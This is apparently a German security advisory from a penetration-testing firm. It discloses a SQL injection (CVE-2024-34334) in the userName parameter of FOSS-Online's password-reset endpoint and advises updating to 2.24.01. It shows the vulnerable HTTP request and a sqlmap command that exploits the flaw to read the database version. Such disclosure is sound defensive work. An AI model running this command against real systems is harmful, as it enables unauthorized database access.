SQL-Injection in FOSS-Online (CVE-2024-34334)

Home / Blog / SQL-Injection in FOSS-Online (CVE-2024-34334)

Übersicht

Betroffenes Produkt: FOSS-Online vor Version 2.24.01
CVSS-Bewertung (v3.1): 9.3 (Kritisch)
Zugewiesene CVE: CVE-2024-34334
Empfehlung: Update zu Version 2.24.01 oder höher
Credit: Simon Holl und Christian Stehle von der MindBytes GmbH
Die Anwendung nutzt Benutzereingaben ungefiltert in SQL-Abfragen. Dadurch können manipulierte Anfragen an die Datenbank gestellt und somit auf weitere gespeicherte Information zugegriffen werden.

Technische Details

Beim Zurücksetzen des Passworts wird die folgende HTTP-Anfrage gesendet. Der darin enthaltene Parameter userName wird anschließend in der Datenbank-Abfrage ohne weitere Validierung verwendet.

POST /oronline/kontakt/PasswortVergessen.jsp HTTP/1.1
Host: ******
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
Connection: close

submitElement=resetPassword&userName=MindBytes&userEmail=a%40example.com

Die Schwachstelle kann beispielsweise durch den sqlmap-Befehl sqlmap -r request.txt --force-ssl -p userName --dbms oracle -b ausgenutzt werden, um die eingesetzte Datenbankversion auszulesen. Das ist in der folgenden Abbildung zu sehen.

CVE-2024-34334 uasnutzen

Bereit für mehr IT-Sicherheit?

Dann nutze unseren Konfigurator, um ein passendes Angebot anzufragen oder schreibe uns, um ein individuelles Angebot zu erhalten.